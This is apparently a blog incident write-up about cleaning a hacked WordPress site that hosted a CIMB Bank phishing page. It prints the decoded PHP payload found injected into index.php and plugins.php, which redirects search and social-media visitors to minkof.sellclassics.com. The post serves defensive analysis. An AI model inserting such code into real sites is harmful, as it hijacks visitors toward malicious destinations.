Parasite PHP script on victim website (minkof.sellclassics.com)

While helping victim website removing phishing site and doing patching I just found interesting malicious code inside the Wordpress based website. The case begin when the victim site hosted a phishing site. The phishing web founded on several directory which is disguised as CIMB Bank. While updating with new Wordpress version and all the plugins I just notice there is something wrong with the size of index.php files. I also installed the SIG (Silent Is Golden) plugins to hide all the directory traversal. It will install an empty index.php file.

After finishing all the basic patches, I just notice the 'empty' index.php file is not empty. Open up the index.php file and found this:

This is definitely not good. Lets decode the base64 encoded eval() part and see what we got.

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://minkof.sellclassics.com/");
exit();
}}}}}

The decoded code above shows that any matched URL from referer will be notify the 'minkof.sellclassics.com' via referer. The script has been set not to run on IE7. The suspicious file that doing this infection is coming from the Wordpress plugins script which is from '/wp-admin/plugins.php'. Let's take a look.

Well, just what I expected. There is an infection script on the beginning of file and if we take a look at the bottom file there is a huge base64 encoded string with eval(). After decoding a while seems like all the encoded script are the same and randomly put the code within the plugins.php. This cause the plugins.php generate many error.

Since the infection has been affected on all .php files with the same scripts, I decided to replace all Wordpress file with the new one. After that, there is still left some infected script especially on their custom theme. Need a special script to crawl and find all the infected file. Thanks to @Xanda.org for writing a nice PHP script to detect PHP web shell which is also can be use in this case. After run the script found more than 100 PHP file still got infected. Remove some unused plugins and themes and some have to fix it manually.

The domain name 'minkof.sellclassics.com' seem already down. I can't go further analysis but there is other guys already analyzed what was happened. As I noticed that is is not only affected on Wordpress but also other popular CMS like Joomla, Drupan and so on.

http://redleg-redleg.blogspot.com/2012/02/costabrava-bee-pl.html
http://productforums.google.com/forum/#!topic/webmasters/SuUGJWwbqeA